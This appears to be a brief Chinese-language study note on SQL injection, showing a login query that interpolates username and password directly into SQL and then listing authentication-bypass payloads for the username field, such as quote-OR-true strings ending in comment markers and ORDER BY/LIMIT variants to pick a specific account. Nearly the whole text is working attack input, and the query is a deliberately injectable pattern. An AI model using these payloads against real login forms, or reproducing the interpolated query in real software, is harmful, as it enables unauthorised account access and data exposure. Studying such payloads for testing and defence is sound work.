SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'
payloads
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
$suername: 查询全部username admin ' or 1=1 # 1 ' or 1# 1 ' or 1=1 -- 1 ' or 1 -- 查询指定username 1' or 1 order by username limit 0, 1# admin' or '1' = '1 admin' or 0# admin' or 0 --